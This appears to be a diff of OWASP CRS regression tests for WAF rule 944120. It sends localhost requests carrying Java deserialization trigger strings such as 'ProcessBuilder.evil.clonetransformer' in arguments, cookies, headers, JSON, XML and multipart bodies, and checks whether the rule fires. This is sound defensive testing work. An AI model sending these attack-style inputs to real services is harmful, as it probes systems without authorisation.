headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 6 desc: "XML element 
includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: 
+ no_log_contains: "id \"944120\"" + - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - 
-----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-15 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-16 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-17 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-18 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - 
test: ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 
- headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - 
